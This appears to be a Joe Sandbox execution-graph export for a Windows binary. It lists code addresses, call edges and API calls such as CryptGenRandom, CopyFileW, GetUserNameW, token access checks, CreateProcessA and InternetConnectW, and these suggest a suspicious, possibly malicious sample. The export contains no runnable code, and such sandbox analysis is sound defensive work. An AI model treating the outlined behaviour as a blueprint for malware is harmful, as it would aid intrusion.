93247->93243 93251 96ca63 LeaveCriticalSection 93248->93251 93250 977e97 93250->93235 93251->93250 93252->93186 93253->93195 93254 9415af 93255 9415bb ___scrt_is_nonwritable_in_current_image 93254->93255 93284 94123e 93255->93284 93257 9415c2 93258 94171b 93257->93258 93261 9415ec 93257->93261 94077 94216a 4 API calls 2 library calls 93258->94077 93260 941722 94078 9617f3 60 API calls _abort 93260->94078 93271 94162b ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 93261->93271 93295 970c35 93261->93295 93263 941728 94079 9617a5 60 API calls _abort 93263->94079 93267 941730 93268 94160b 93270 94168c 93305 970624 93270->93305 93271->93270 94073 9617bb 64 API calls 4 library calls 93271->94073 93274 941692 93309 8dc940 93274->93309 93278 9416b3 93278->93260 93279 9416b7 93278->93279 93280 9416c0 93279->93280 94075 961796 60 API calls _abort 93279->94075 94076 9413c4 13 API calls 2 library calls 93280->94076 93283 9416c9 93283->93268 93285 941247 93284->93285 94080 941905 IsProcessorFeaturePresent 93285->94080 93287 941253 94081 95aa06 10 API calls 3 library calls 93287->94081 93289 941258 93294 94125c 93289->93294 94082 970b15 93289->94082 93292 941273 93292->93257 93294->93257 93297 970c4c 93295->93297 93296 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 93298 941605 93296->93298 93297->93296 93298->93268 93299 970bd9 93298->93299 93300 970c24 93299->93300 93301 970c08 93299->93301 93302 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 93300->93302 93301->93300 94097 8b1960 93301->94097 93303 970c31 93302->93303 93303->93271 93306 970632 93305->93306 93307 97062d 93305->93307 93306->93274 94257 97036b 82 API calls 93307->94257 94258 941f40 93309->94258 93312 8dc9a4 93313 8e1fd0 collate 28 API calls 93312->93313 93315 8dc9d1 93313->93315 93314 8e2110 28 API calls 93314->93315 93315->93314 93316 8dca09 93315->93316 93317 8e2410 _MREFOpen@16 28 API calls 93316->93317 93318 8dca1a 93317->93318 
95506 8d7070 148 API calls 7 library calls 93318->95506 93320 8dca1f 93321 8e2290 collate 26 API calls 93320->93321 93325 8dca34 93321->93325 93322 8dcbe5 93329 8ded55 93322->93329 94263 8b87e0 93322->94263 93324 8dcbcd SetErrorMode SetConsoleTitleW 94260 8c60a0 EnumWindows 93324->94260 93325->93322 93325->93324 93325->93325 93327 8dcce0 94300 8c3030 93327->94300 93330 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 93329->93330 93332 8ded6f 93330->93332 94074 942289 GetModuleHandleW 93332->94074 93333 8dcc02 93333->93327 94281 8e1b30 93333->94281 93346 8dcd2a 94394 8b49c0 93346->94394 93350 8dcd35 94401 8ea350 93350->94401 93351 8dcc9f 93353 8e2290 collate 26 API calls 93351->93353 93354 8dccae 93353->93354 93358 8b87e0 97 API calls 93354->93358 93360 8dccc6 93358->93360 93362 8e2290 collate 26 API calls 93360->93362 93364 8dccd1 93362->93364 93363 8b49c0 52 API calls 93365 8dcd84 93363->93365 93366 8e2290 collate 26 API calls 93364->93366 93367 8b49c0 52 API calls 93365->93367 93366->93327 93368 8dcd93 93367->93368 93369 8dcdac CopyFileW 93368->93369 93370 8ea350 28 API calls 93369->93370 93371 8dcdca 93370->93371 93372 8ea420 28 API calls 93371->93372 93373 8dcde0 93372->93373 93374 8ea2e0 28 API calls 93373->93374 93375 8dcdf6 93374->93375 93376 8b49c0 52 API calls 93375->93376 93377 8dce04 93376->93377 93378 8b49c0 52 API calls 93377->93378 93379 8dce13 93378->93379 93380 8dce2c CopyFileW 93379->93380 93381 8dce41 93380->93381 94417 8eace0 93381->94417 93385 8dce80 93386 8e9d90 28 API calls 93385->93386 93387 8dce96 93386->93387 93388 8e2290 collate 26 API calls 93387->93388 93389 8dcea8 93388->93389 93390 8e9750 28 API calls 93389->93390 93391 8dcebf 93390->93391 93392 8e9d90 28 API calls 93391->93392 93393 8dced5 93392->93393 93394 8e2290 collate 26 API calls 93393->93394 93395 8dcee7 93394->93395 93396 8b87e0 97 API calls 93395->93396 93397 8dceff 93396->93397 93398 8e2290 collate 26 API calls 93397->93398 93399 8dcf0a 
93398->93399 93400 8b87e0 97 API calls 93399->93400 93401 8dcf22 93400->93401 93402 8e2290 collate 26 API calls 93401->93402 93403 8dcf2d 93402->93403 93404 8eace0 28 API calls 93403->93404 93405 8dcf63 93404->93405 93406 8e9750 28 API calls 93405->93406 93407 8dcf7e 93406->93407 93408 8e9d90 28 API calls 93407->93408 93409 8dcf94 93408->93409 93410 8e2290 collate 26 API calls 93409->93410 93411 8dcfa6 93410->93411 93412 8b87e0 97 API calls 93411->93412 93413 8dcfbe 93412->93413 93414 8e2290 collate 26 API calls 93413->93414 93415 8dcfc9 93414->93415 94431 8d45a0 GetCurrentThread OpenThreadToken 93415->94431 93418 8b87e0 97 API calls 93419 8dcfe4 93418->93419 94458 8e1aa0 93419->94458 93421 8dd013 94463 8c38c0 93421->94463 93423 8dd083 94812 8c6550 GlobalMemoryStatusEx 93423->94812 93425 8dd08b 93427 8c6550 6 API calls 93425->93427 93426 8dd018 93426->93423 93429 8e1aa0 28 API calls 93426->93429 93428 8dd095 93427->93428 93430 8c6550 6 API calls 93428->93430 93434 8dd0ac 93428->93434 93431 8dd05b 93429->93431 93432 8dd0a2 93430->93432 93433 8e1aa0 28 API calls 93431->93433 93435 8c6550 6 API calls 93432->93435 93436 8dd06e 93433->93436 93438 8eace0 28 API calls 93434->93438 93435->93434 94501 8b9300 93436->94501 93439 8dd0f6 93438->93439 94832 8e2260 93439->94832 93444 8e19a0 26 API calls 93445 8dd12a 93444->93445 93446 8b49c0 52 API calls 93445->93446 93447 8dd135 93446->93447 93448 8eace0 28 API calls 93447->93448 93449 8dd169 93448->93449 93450 8b8ae0 71 API calls 93449->93450 93451 8dd17e 93450->93451 94848 8ea5a0 93451->94848 93454 8e19a0 26 API calls 94073->93270 94074->93278 94075->93280 94076->93283 94077->93260 94078->93263 94079->93267 94080->93287 94081->93289 94086 97d18d 94082->94086 94085 95aa2f 8 API calls 3 library calls 94085->93294 94089 97d1a6 94086->94089 94090 97d1aa 94086->94090 94087 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94088 941265 94087->94088 94088->93292 94088->94085 94089->94087 94090->94089 94092 
97435c 94090->94092 94093 974363 94092->94093 94094 9743a6 GetStdHandle 94093->94094 94095 97440e 94093->94095 94096 9743b9 GetFileType 94093->94096 94094->94093 94095->94090 94096->94093 94104 91ee60 94097->94104 94099 8b198c 94113 915100 94099->94113 94103 8b19b5 94103->93301 94136 8f4f60 94104->94136 94106 91ee97 94159 94109a 94106->94159 94109 8f4f60 28 API calls 94110 91ef0b 94109->94110 94167 8e6e80 94110->94167 94112 91ef25 Concurrency::details::QuickBitSet::QuickBitSet 94112->94099 94114 915142 94113->94114 94115 91513e 94113->94115 94116 918730 _MREFOpen@16 24 API calls 94114->94116 94117 8f4f60 28 API calls 94115->94117 94116->94115 94118 915161 94117->94118 94218 914a30 CryptAcquireContextA 94118->94218 94120 915170 94235 914ff0 94120->94235 94122 91517c CryptGenRandom 94123 9151e4 94122->94123 94124 91518a 94122->94124 94126 8e23a0 _MREFOpen@16 28 API calls 94123->94126 94125 91519c CryptReleaseContext 94124->94125 94129 9151a5 94124->94129 94125->94129 94127 9151f1 94126->94127 94249 914b90 30 API calls 4 library calls 94127->94249 94133 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94129->94133 94130 915201 94250 958621 RaiseException 94130->94250 94132 91520f 94134 8b19ab 94133->94134 94135 941427 29 API calls __onexit 94134->94135 94135->94103 94137 8f4fb6 94136->94137 94141 8f4f91 94136->94141 94138 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94137->94138 94139 8f4fce 94138->94139 94139->94106 94140 8f4fac 94140->94137 94143 8f5002 94140->94143 94141->94137 94141->94140 94142 8f4fd4 94141->94142 94179 8e23a0 94142->94179 94144 8e23a0 _MREFOpen@16 28 API calls 94143->94144 94146 8f500f 94144->94146 94185 8f5750 28 API calls _MREFOpen@16 94146->94185 94150 8f5022 94186 958621 RaiseException 94150->94186 94151 8f4ff4 94184 958621 RaiseException 94151->94184 94154 8f5030 94187 958312 27 API calls ___std_exception_copy 94154->94187 94156 8f5087 94188 8e2410 94156->94188 94158 8f50a9 
94158->94106 94160 94109f 94159->94160 94161 96b48c ___std_exception_copy 21 API calls 94160->94161 94162 91eef1 94160->94162 94164 9410bb Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 94160->94164 94213 96d7eb 7 API calls 2 library calls 94160->94213 94161->94160 94162->94109 94162->94112 94214 958621 RaiseException 94164->94214 94166 942370 94168 8e6eaf 94167->94168 94169 8e6ee1 94167->94169 94171 8e6eb3 94168->94171 94215 9186c0 30 API calls 3 library calls 94168->94215 94170 8e23a0 _MREFOpen@16 28 API calls 94169->94170 94173 8e6eee 94170->94173 94171->94112 94216 8b5930 28 API calls _MREFOpen@16 94173->94216 94174 8e6ecd 94174->94112 94176 8e6f01 94217 958621 RaiseException 94176->94217 94178 8e6f0f 94180 8e23c0 94179->94180 94180->94180 94199 8e1fd0 94180->94199 94182 8e23d2 94183 8f5750 28 API calls _MREFOpen@16 94182->94183 94183->94151 94184->94143 94185->94150 94186->94154 94187->94156 94189 8e2436 94188->94189 94190 8e243d 94189->94190 94191 8e2496 94189->94191 94192 8e2473 94189->94192 94190->94158 94195 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 94191->94195 94196 8e248b _LStrxfrm 94191->94196 94193 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 94192->94193 94194 8e2484 94193->94194 94194->94196 94197 965942 messages 26 API calls 94194->94197 94195->94196 94196->94158 94198 8e24d3 94197->94198 94203 8e1fee SimpleUString::operator= 94199->94203 94204 8e2014 94199->94204 94200 8e20fe 94212 8ee3b0 28 API calls SimpleUString::operator= 94200->94212 94203->94182 94204->94200 94205 8e208d 94204->94205 94206 8e2068 94204->94206 94208 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 94205->94208 94211 8e2079 _LStrxfrm 94205->94211 94207 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 94206->94207 94207->94211 94208->94211 94209 965942 messages 26 API calls 94209->94200 94210 8e20e0 
Concurrency::details::SchedulerBase::Statistics 94210->94182 94211->94209 94211->94210 94213->94160 94214->94166 94215->94174 94216->94176 94217->94178 94219 914aa6 94218->94219 94220 914a7b GetLastError CryptAcquireContextA 94218->94220 94222 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94219->94222 94220->94219 94221 914a95 CryptAcquireContextA 94220->94221 94221->94219 94223 914ac4 SetLastError 94221->94223 94224 914ac0 94222->94224 94225 8e23a0 _MREFOpen@16 28 API calls 94223->94225 94224->94120 94226 914ad8 94225->94226 94251 914b90 30 API calls 4 library calls 94226->94251 94228 914aeb 94252 958621 RaiseException 94228->94252 94230 914af9 94253 958312 27 API calls ___std_exception_copy 94230->94253 94232 914b47 94233 8e2410 _MREFOpen@16 28 API calls 94232->94233 94234 914b69 94233->94234 94234->94120 94236 9150b7 94235->94236 94238 915035 94235->94238 94254 940f9a 5 API calls __Init_thread_wait 94236->94254 94239 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 94238->94239 94247 915080 Concurrency::details::SchedulerBase::Statistics 94238->94247 94241 915045 94239->94241 94240 9150c1 94240->94238 94255 941427 29 API calls __onexit 94240->94255 94243 914a30 35 API calls 94241->94243 94246 91505d 94241->94246 94243->94246 94244 9150e5 94256 940f50 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94244->94256 94246->94247 94248 915077 CryptReleaseContext 94246->94248 94247->94122 94248->94247 94249->94130 94250->94132 94251->94228 94252->94230 94253->94232 94254->94240 94255->94244 94256->94238 94257->93306 94259 8dc95c GetConsoleWindow ShowWindow 94258->94259 94259->93312 94259->93325 94261 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94260->94261 94262 8c60d2 94261->94262 94262->93322 94264 8b8841 94263->94264 94265 8b8858 94264->94265 94266 8b88c3 94264->94266 94268 8e1fd0 collate 28 API calls 94265->94268 95554 965cc9 94266->95554 94277 8b8872 
94268->94277 94269 8b88d5 94270 8b8908 94269->94270 94280 965cc9 28 API calls 94269->94280 95569 8e2110 94269->95569 95574 96550f 94270->95574 94271 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94273 8b88bf 94271->94273 94273->93333 94275 8b8978 94278 965942 messages 26 API calls 94275->94278 94276 8b889c Concurrency::details::SchedulerBase::Statistics 94276->94271 94277->94275 94277->94276 94279 8b897d 94278->94279 94280->94269 94282 8e1b7e 94281->94282 94284 8e1b5a 94281->94284 95867 8e8890 28 API calls SimpleUString::operator= 94282->95867 94286 8e1fd0 collate 28 API calls 94284->94286 94285 8e1b83 94287 8dcc65 94286->94287 94288 8e9850 94287->94288 94289 8e9860 94288->94289 95868 8ee970 94289->95868 94291 8dcc7b 94292 8e9d90 94291->94292 94293 8e2110 28 API calls 94292->94293 94294 8dcc91 94293->94294 94295 8e2290 94294->94295 94296 8e229b 94295->94296 94297 8e22b6 Concurrency::details::SchedulerBase::Statistics 94295->94297 94296->94297 94298 965942 messages 26 API calls 94296->94298 94297->93351 94299 8e22da 94298->94299 94301 8e1fd0 collate 28 API calls 94300->94301 94302 8c3081 94301->94302 94303 8e2410 _MREFOpen@16 28 API calls 94302->94303 94304 8c3097 94303->94304 95878 8c2380 94304->95878 94306 8c315f Concurrency::details::SchedulerBase::Statistics 94307 8e1fd0 collate 28 API calls 94306->94307 94310 8c318e 94307->94310 94308 8c3890 94312 965942 messages 26 API calls 94308->94312 94309 8c30a9 Concurrency::details::SchedulerBase::Statistics 94309->94306 94309->94308 94311 8e2410 _MREFOpen@16 28 API calls 94310->94311 94313 8c31a4 94311->94313 94314 8c38b3 94312->94314 94315 8c2380 30 API calls 94313->94315 94317 8c31b6 Concurrency::details::SchedulerBase::Statistics 94315->94317 94316 8e1fd0 collate 28 API calls 94318 8c329b 94316->94318 94317->94316 94319 8e2410 _MREFOpen@16 28 API calls 94318->94319 94320 8c32b1 94319->94320 94321 8c2380 30 API calls 94320->94321 94324 8c32c3 
Concurrency::details::SchedulerBase::Statistics 94321->94324 94322 8eace0 28 API calls 94323 8c33b5 94322->94323 94325 8e1fd0 collate 28 API calls 94323->94325 94324->94322 94326 8c33e1 94325->94326 94327 8e2410 _MREFOpen@16 28 API calls 94326->94327 94328 8c33f3 94327->94328 94329 8c2380 30 API calls 94328->94329 94331 8c3402 Concurrency::details::SchedulerBase::Statistics 94329->94331 94330 8eadc0 28 API calls 94332 8c34d3 94330->94332 94331->94330 95954 8e7430 94332->95954 94334 8c34f0 94335 8eace0 28 API calls 94334->94335 94336 8c3522 94335->94336 94337 8e1fd0 collate 28 API calls 94336->94337 94338 8c354b 94337->94338 94339 8e2410 _MREFOpen@16 28 API calls 94338->94339 94340 8c355d 94339->94340 94341 8c2380 30 API calls 94340->94341 94344 8c356c Concurrency::details::SchedulerBase::Statistics 94341->94344 94342 8eadc0 28 API calls 94343 8c363d 94342->94343 94345 8e7430 SimpleUString::operator= 28 API calls 94343->94345 94344->94342 94346 8c365a 94345->94346 94347 8e1fd0 collate 28 API calls 94346->94347 94348 8c367f 94347->94348 94349 8e2410 _MREFOpen@16 28 API calls 94348->94349 94350 8c3692 94349->94350 94351 8c2380 30 API calls 94350->94351 94352 8c36a1 Concurrency::details::SchedulerBase::Statistics 94351->94352 94353 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94352->94353 94354 8c388c GetModuleFileNameW 94353->94354 94355 8e1a30 94354->94355 94356 8e1a52 94355->94356 94356->94356 94357 8e7430 SimpleUString::operator= 28 API calls 94356->94357 94358 8dcd0b 94357->94358 94359 8c3eb0 GetUserNameW 94358->94359 94360 8c3f20 94359->94360 94361 8e7430 SimpleUString::operator= 28 API calls 94360->94361 94362 8c3f42 94361->94362 94363 8e7430 SimpleUString::operator= 28 API calls 94362->94363 94364 8c3f6e 94363->94364 94365 8eace0 28 API calls 94364->94365 94366 8c3fa6 94365->94366 94367 8e1fd0 collate 28 API calls 94366->94367 94369 8c3fcf Concurrency::details::SchedulerBase::Statistics 94367->94369 94368 8c4052 
Concurrency::details::SchedulerBase::Statistics 94371 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94368->94371 94369->94368 94370 8c4075 94369->94370 94373 965942 messages 26 API calls 94370->94373 94372 8c4071 94371->94372 94375 8c3d50 GetSystemDirectoryW 94372->94375 94374 8c407a 94373->94374 94376 8c3dd0 94375->94376 94377 8e7430 SimpleUString::operator= 28 API calls 94376->94377 94378 8c3dee 94377->94378 94379 8e7430 SimpleUString::operator= 28 API calls 94378->94379 94380 8c3e3f 94379->94380 94381 8e19a0 26 API calls 94380->94381 94382 8c3e4d 94381->94382 94383 8c3e7f Concurrency::details::SchedulerBase::Statistics 94382->94383 94385 8c3ea5 94382->94385 94384 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94383->94384 94386 8c3ea1 94384->94386 94387 965942 messages 26 API calls 94385->94387 94389 8e19a0 94386->94389 94388 8c3eaa 94387->94388 94390 8e19ae 94389->94390 94391 8e19d7 Concurrency::details::SchedulerBase::Statistics 94389->94391 94390->94391 94392 965942 messages 26 API calls 94390->94392 94391->93346 94393 8e1a20 94392->94393 94395 8b49cb 94394->94395 94396 8b49ec Concurrency::details::SchedulerBase::Statistics 94394->94396 94395->94396 94397 965942 messages 26 API calls 94395->94397 94396->93350 94398 8b4a12 94397->94398 96110 93d370 94398->96110 94402 8ea3b0 94401->94402 94402->94402 96138 8e16e0 94402->96138 94404 8ea3cf 96147 8e88e0 94404->96147 94406 8ea3e1 94407 8e88e0 28 API calls 94406->94407 94408 8dcd4a 94407->94408 94409 8ea420 94408->94409 94410 8ea435 94409->94410 94411 8e88e0 28 API calls 94410->94411 94412 8dcd60 94411->94412 94413 8ea2e0 94412->94413 94414 8ea2f1 94413->94414 94414->94414 94415 8e88e0 28 API calls 94414->94415 94416 8dcd76 94415->94416 94416->93363 94418 8e1c10 _MREFOpen@16 28 API calls 94417->94418 94420 8ead2d 94418->94420 94419 8dce65 94422 8e9750 94419->94422 94420->94419 96160 8ec270 94420->96160 94423 8e97b0 94422->94423 94423->94423 94424 8e1c10 
_MREFOpen@16 28 API calls 94423->94424 94425 8e97c9 94424->94425 94426 8e2110 28 API calls 94425->94426 94427 8e97d1 94426->94427 94430 8e97ec SimpleUString::operator= 94427->94430 96174 8ec3b0 28 API calls 5 library calls 94427->96174 94429 8e9832 94429->93385 94430->93385 94432 8d45f4 GetLastError 94431->94432 94433 8d4620 DuplicateToken 94431->94433 94434 8d475a 94432->94434 94435 8d4605 GetCurrentProcess OpenProcessToken 94432->94435 94433->94434 94436 8d4637 AllocateAndInitializeSid 94433->94436 94439 8d476c 94434->94439 94440 8d4769 LocalFree 94434->94440 94435->94433 94435->94434 94436->94434 94437 8d4662 LocalAlloc 94436->94437 94437->94434 94438 8d4677 InitializeSecurityDescriptor 94437->94438 94438->94434 94443 8d4688 GetLengthSid LocalAlloc 94438->94443 94441 8d4776 94439->94441 94442 8d4773 LocalFree 94439->94442 94440->94439 94444 8d477d FreeSid 94441->94444 94445 8d4784 94441->94445 94442->94441 94443->94434 94446 8d46a8 InitializeAcl 94443->94446 94444->94445 94447 8d4794 94445->94447 94448 8d4791 CloseHandle 94445->94448 94446->94434 94449 8d46ba AddAccessAllowedAce 94446->94449 94450 8d479e 94447->94450 94451 8d479b CloseHandle 94447->94451 94448->94447 94449->94434 94452 8d46d2 SetSecurityDescriptorDacl 94449->94452 94453 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94450->94453 94451->94450 94452->94434 94454 8d46e6 SetSecurityDescriptorGroup SetSecurityDescriptorOwner IsValidSecurityDescriptor 94452->94454 94455 8d47ac 94453->94455 94454->94434 94456 8d470f AccessCheck 94454->94456 94455->93418 94456->94434 94457 8d4751 94456->94457 94457->94434 94459 8e1ac6 94458->94459 94460 8e1acd 94459->94460 94461 8e7d20 SimpleUString::operator= 28 API calls 94459->94461 94460->93421 94462 8e1b01 _LStrxfrm 94461->94462 94462->93421 94464 8ea350 28 API calls 94463->94464 94465 8c3911 94464->94465 94466 8e7430 SimpleUString::operator= 28 API calls 94465->94466 94467 8c395e 94466->94467 94468 8e88e0 28 API calls 94467->94468 
[Execution graph export: the rendered graph's node and edge list (node id, code address, labels, src->dst edges) is not reproduced here; only the information recoverable from it follows.]

Windows API calls appearing as node labels in this part of the graph:
File system: GetFileAttributesW and CreateDirectoryW (chains of CreateDirectoryW nodes at 8c3b82-8c3bfc, each entered after a GetFileAttributesW check, i.e. a directory tree is created), CreateFileW, WriteFile, GetConsoleMode, WriteConsoleW, SetStdHandle; one node (93d060) is labelled CreateFileW DeviceIoControl CloseHandle.
Process and handle management: CreatePipe (97773c), GetCurrentProcess and DuplicateHandle (965042), CreateProcessA (9651cb), WaitForSingleObject and GetExitCodeProcess (977472, 97747e), CloseHandle. The surrounding node labels (__wsopen_s, std::_Xfsopen, __dosmaperr, __Wcrtomb) place these nodes inside C runtime code rather than the sample's own logic.
Synchronisation and error handling: EnterCriticalSection, LeaveCriticalSection, GetLastError, SetLastError, RaiseException.
Network: InternetConnectW (8c6bc1).
Remaining node labels are symbol names the sandbox attached to library code (SimpleUString::operator=, Concurrency::details::SchedulerBase::Statistics, _MREFOpen@16, collate, _free, __fread_nolock) and per-node "N API calls" counts.
97461->97456 97462 8c71bd 97463 965942 messages 26 API calls 97462->97463 97466 8c71c2 97463->97466 97464->97462 97465 8c6aeb Concurrency::details::SchedulerBase::Statistics 97464->97465 97467 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 97465->97467 97468 8c6ea2 97467->97468 97469->97455 97470->97460 97471 973eca 97472 973ea4 __fread_nolock 26 API calls 97471->97472 97473 973ed8 97472->97473 97474 973ee6 97473->97474 97475 973f05 97473->97475 97476 9661c3 __Wcrtomb 20 API calls 97474->97476 97477 973f12 97475->97477 97478 973f1f 97475->97478 97481 973eeb 97476->97481 97479 9661c3 __Wcrtomb 20 API calls 97477->97479 97478->97481 97482 980447 __fread_nolock 26 API calls 97478->97482 97483 973fa2 97478->97483 97484 973faf 97478->97484 97479->97481 97482->97483 97483->97484 97497 976336 21 API calls 2 library calls 97483->97497 97486 9740f0 97484->97486 97487 973ea4 __fread_nolock 26 API calls 97486->97487 97488 9740ff 97487->97488 97489 9741a3 97488->97489 97490 974111 97488->97490 97491 975d3c __wsopen_s 88 API calls 97489->97491 97492 97412e 97490->97492 97495 974154 97490->97495 97494 97413b 97491->97494 97493 975d3c __wsopen_s 88 API calls 97492->97493 97493->97494 97494->97481 97495->97494 97498 9797da 97495->97498 97497->97484 97501 979657 97498->97501 97500 9797f0 97500->97494 97502 979663 ___scrt_is_nonwritable_in_current_image 97501->97502 97503 979683 97502->97503 97504 97966b 97502->97504 97506 979737 97503->97506 97510 9796bb 97503->97510 97505 9661b0 __dosmaperr 20 API calls 97504->97505 97507 979670 97505->97507 97508 9661b0 __dosmaperr 20 API calls 97506->97508 97511 9661c3 __Wcrtomb 20 API calls 97507->97511 97509 97973c 97508->97509 97512 9661c3 __Wcrtomb 20 API calls 97509->97512 97526 97d3a4 EnterCriticalSection 97510->97526 97514 979678 std::_Xfsopen 97511->97514 97515 979744 97512->97515 97514->97500 97528 965932 26 API calls messages 97515->97528 97516 9796c1 97518 9796e5 97516->97518 97519 9796fa 97516->97519 
97520 9661c3 __Wcrtomb 20 API calls 97518->97520 97521 97975c __wsopen_s 28 API calls 97519->97521 97522 9796ea 97520->97522 97523 9796f5 97521->97523 97524 9661b0 __dosmaperr 20 API calls 97522->97524 97527 97972f LeaveCriticalSection __wsopen_s 97523->97527 97524->97523 97526->97516 97527->97514 97528->97514 97529 97537a 97534 9750b1 97529->97534 97533 9753a2 97539 9750e2 try_get_first_available_module 97534->97539 97535 9661c3 __Wcrtomb 20 API calls 97536 9752e1 97535->97536 97552 965932 26 API calls messages 97536->97552 97538 975236 97538->97533 97546 9811b9 97538->97546 97542 97522b 97539->97542 97549 98049d 66 API calls 2 library calls 97539->97549 97541 97527f 97541->97542 97550 98049d 66 API calls 2 library calls 97541->97550 97542->97535 97542->97538 97544 97529e 97544->97542 97551 98049d 66 API calls 2 library calls 97544->97551 97553 980845 97546->97553 97548 9811d4 97548->97533 97549->97541 97550->97544 97551->97542 97552->97538 97556 980851 ___scrt_is_nonwritable_in_current_image 97553->97556 97554 98085f 97555 9661c3 __Wcrtomb 20 API calls 97554->97555 97557 980864 97555->97557 97556->97554 97558 980898 97556->97558 97611 965932 26 API calls messages 97557->97611 97564 980e90 97558->97564 97562 98086e std::_Xfsopen 97562->97548 97613 980bf3 97564->97613 97567 980edb 97569 97d47e __wsopen_s 24 API calls 97567->97569 97568 980ec2 97570 9661b0 __dosmaperr 20 API calls 97568->97570 97571 980ee0 97569->97571 97572 980ec7 97570->97572 97573 980ee9 97571->97573 97574 980f00 97571->97574 97575 9661c3 __Wcrtomb 20 API calls 97572->97575 97576 9661b0 __dosmaperr 20 API calls 97573->97576 97631 980b5e CreateFileW 97574->97631 97602 9808bc 97575->97602 97578 980eee 97576->97578 97579 9661c3 __Wcrtomb 20 API calls 97578->97579 97579->97572 97580 980fb6 GetFileType 97581 981008 97580->97581 97582 980fc1 GetLastError 97580->97582 97590 97d3c7 __wsopen_s 21 API calls 97581->97590 97649 96618d 20 API calls 3 library calls 97582->97649 97583 980f8b GetLastError 97648 
96618d 20 API calls 3 library calls 97583->97648 97586 980f39 97586->97580 97586->97583 97647 980b5e CreateFileW 97586->97647 97588 980fcf CloseHandle 97588->97572 97591 980ff8 97588->97591 97589 980f7e 97589->97580 97589->97583 97592 981029 97590->97592 97593 9661c3 __Wcrtomb 20 API calls 97591->97593 97594 981075 97592->97594 97632 980d6f 97592->97632 97595 980ffd 97593->97595 97599 9810a2 97594->97599 97650 980911 97 API calls 4 library calls 97594->97650 97595->97572 97598 98109b 97598->97599 97600 9810b3 97598->97600 97601 97615c __wsopen_s 29 API calls 97599->97601 97600->97602 97603 981131 CloseHandle 97600->97603 97601->97602 97612 9808e5 LeaveCriticalSection __wsopen_s 97602->97612 97651 980b5e CreateFileW 97603->97651 97605 98115c 97606 981192 97605->97606 97607 981166 GetLastError 97605->97607 97606->97602 97652 96618d 20 API calls 3 library calls 97607->97652 97609 981172 97653 97d590 21 API calls 3 library calls 97609->97653 97611->97562 97612->97562 97614 980c2e 97613->97614 97615 980c14 97613->97615 97654 980b83 97614->97654 97615->97614 97617 9661c3 __Wcrtomb 20 API calls 97615->97617 97618 980c23 97617->97618 97661 965932 26 API calls messages 97618->97661 97620 980c66 97621 980c95 97620->97621 97623 9661c3 __Wcrtomb 20 API calls 97620->97623 97628 980ce8 97621->97628 97663 970c7a 26 API calls 2 library calls 97621->97663 97625 980c8a 97623->97625 97624 980ce3 97626 980d62 97624->97626 97624->97628 97662 965932 26 API calls messages 97625->97662 97664 96595f 11 API calls _abort 97626->97664 97628->97567 97628->97568 97630 980d6e 97631->97586 97633 980d99 97632->97633 97642 980d95 97632->97642 97634 9797f5 __wsopen_s 28 API calls 97633->97634 97633->97642 97635 980dab 97634->97635 97636 980dbb 97635->97636 97637 980dd1 97635->97637 97638 9661b0 __dosmaperr 20 API calls 97636->97638 97639 9792a2 __fread_nolock 38 API calls 97637->97639 97640 980dc0 97638->97640 97641 980de3 97639->97641 97640->97642 97644 9661c3 __Wcrtomb 20 API calls 97640->97644 
97646 980df9 97641->97646 97666 983c41 88 API calls 5 library calls 97641->97666 97642->97594 97643 9797f5 __wsopen_s 28 API calls 97643->97640 97644->97642 97646->97640 97646->97643 97647->97589 97648->97572 97649->97588 97650->97598 97651->97605 97652->97609 97653->97606 97656 980b9b 97654->97656 97655 980bb6 97655->97620 97656->97655 97657 9661c3 __Wcrtomb 20 API calls 97656->97657 97658 980bda 97657->97658 97665 965932 26 API calls messages 97658->97665 97660 980be5 97660->97620 97661->97614 97662->97621 97663->97624 97664->97630 97665->97660 97666->97646

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
